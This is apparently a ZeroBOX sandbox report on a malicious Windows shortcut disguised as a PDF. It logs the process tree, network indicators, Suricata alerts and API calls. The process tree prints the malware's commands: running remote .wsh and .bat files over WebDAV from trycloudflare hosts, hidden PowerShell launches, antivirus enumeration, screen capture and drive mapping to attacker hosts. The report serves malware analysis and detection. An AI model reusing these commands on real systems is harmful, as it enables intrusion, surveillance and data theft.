Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 16, 2025, 11:05 a.m.	April 16, 2025, 11:08 a.m.

Size	2.7KB
Type	MS Windows shortcut, Points to a file or directory, Has Working directory, Icon number=11, Archive, ctime=Sun Apr 13 12:44:06 2025, mtime=Sun Apr 13 12:29:50 2025, atime=Sun Apr 13 12:29:50 2025, length=101, window=hide
MD5	`bfe2f106c5a937a00509f9ba9f6c916e`
SHA256	`5f0ff028fe981ee258397cb0a1bbefc065126d4bf5d7a80d5fe78720f1179d4e`
CRC32	`BEE5F515`
ssdeep	`48:8zWa5E8XdQBW0XuHFHxE8D7m22JWO6c22WRE8z:8zKIuuleuVCEfeK`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\DKM-39902004.pdf.lnk
2548
- wscript.exe "C:\Windows\System32\WScript.exe" "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32\DE.wsh"
  2800
  - cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
    2908
    - cmd.exe C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
      2992
      - powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
        1152
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
        2504
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        2356
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2356 CREDAT:145409
        676
        
        net.exe net use U: "\\divide-snow-pound-clip.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
        3004
        
        powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\test22\Contacts\zone.zip' -DestinationPath 'C:\Users\test22\Contacts' -Force"
        1780
        
        net.exe net use U: /delete /yes
        3048
  - cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
    2104
    - cmd.exe C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
      2180
      - powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
        2364
        
        cmd.exe "C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
        2756
        
        cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
        2940
        
        powershell.exe powershell -Command "[System.Net.Dns]::GetHostName()"
        2912
        
        cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName" 2>nul
        2168
        
        powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName"
        1308
        
        powershell.exe powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::AllScreens[0]; $bitmap = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bitmap.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
        148
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        2772
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        1332
        
        choice.exe choice /n /c y /t 0
        2536
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        2380
        
        choice.exe choice /n /c y /t 0
        2120
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        3032
        
        choice.exe choice /n /c y /t 0
        2864
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        916
        
        choice.exe choice /n /c y /t 0
        2000
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        416
        
        choice.exe choice /n /c y /t 0
        3040
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        2896
        
        choice.exe choice /n /c y /t 0
        1108
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        1304
        
        choice.exe choice /n /c y /t 0
        1892
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        1996
        
        choice.exe choice /n /c y /t 0
        2696
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        2360
        
        choice.exe choice /n /c y /t 0
        2112
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        2844
        
        choice.exe choice /n /c y /t 0
        2256
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        320
        
        choice.exe choice /n /c y /t 0
        2828
        
        net.exe net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
        3132
        
        choice.exe choice /n /c y /t 0
        3268
  - cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
    2196
    - cmd.exe C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
      2516
      - powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
        2452
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
        2176

Name	Response	Post-Analysis Lookup
divide-snow-pound-clip.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.230.132
achievements-plates-station-gaming.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.230.132
characters-contrary-foster-workout.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.231.132
www.wmaccess.com	A 217.6.220.73	217.6.220.73

IP Address	Status	Action
104.16.230.132	Active	Moloch
104.16.231.132	Active	Moloch
164.124.101.2	Active	Moloch
217.6.220.73	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 217.6.220.73:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 217.6.220.73:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 217.6.220.73:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49175 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49175 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49175 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49186 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49186 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49186 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49194 -> 217.6.220.73:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 217.6.220.73:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:53850 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49213 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49213 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49220 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49229 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49229 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49229 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49221 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49221 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49221 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49236 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49236 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49236 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49220 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49223 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49227 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49227 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49227 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49231 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49231 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49231 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49234 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49234 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49235 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49161 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49191 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49163 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49171 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49212 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49175 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49216 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49186 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49181 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49213 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49217 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49218 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49268 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49220 104.16.230.132:443	None	None	None
TLSv1 192.168.56.101:49229 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49221 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49236 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49223 104.16.230.132:443	None	None	None
TLSv1 192.168.56.101:49265 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49227 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49231 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49234 104.16.230.132:443	None	None	None
TLSv1 192.168.56.101:49235 104.16.230.132:443	None	None	None
TLSv1 192.168.56.101:49241 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49258 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

Queries for the computername (44 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 16, 2025, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 16, 2025, 11:06 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0
IsDebuggerPresent April 16, 2025, 11:06 a.m.			0	0

Command line console output was observed (37 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: supported. Defaulting to Windows directory. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: C:\Windows> console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: supported. Defaulting to Windows directory. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: C:\Windows> console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: The filename, directory name, or volume label syntax is incorrect. console_handle: 0x0000000f	1	1
WriteConsoleA April 16, 2025, 11:06 a.m.	buffer: Watchdog is active... console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: supported. Defaulting to Windows directory. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: U: was deleted successfully. console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000f	1	1
